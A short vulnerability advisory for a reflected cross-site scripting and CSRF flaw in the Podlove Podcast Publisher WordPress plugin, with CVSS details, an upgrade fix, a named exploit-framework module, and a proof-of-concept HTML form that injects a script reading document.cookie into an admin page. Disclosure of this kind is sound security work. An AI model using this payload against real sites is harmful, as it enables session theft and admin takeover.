Homepage
https://wordpress.org/plugins/podlove-podcasting-plugin-for-wordpress/
Overview
Due to a lack of CSRF mitigation and entity encoding in lib/episode_asset_list_table.php
, it is possible to execute scripts in the context of an admin user by including a script in the page
field during a form post.
CVSS Score
4.8
CVSS Vector
(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)
Versions Affected
2.3.15 and below
Solution
Upgrade to the latest version of the plugin
WordPress Exploit Framework Module
exploit/xss/reflected/podlove_podcast_publisher_reflected_xss_shell_upload
Proof of Concept
<form method="POST" action="[target]/wp-admin/admin.php?page=podlove_episode_assets_settings_handle">
<input type="text" name="page" value=""><script>alert(document.cookie)</script><a href="">
<input type="submit">
</form>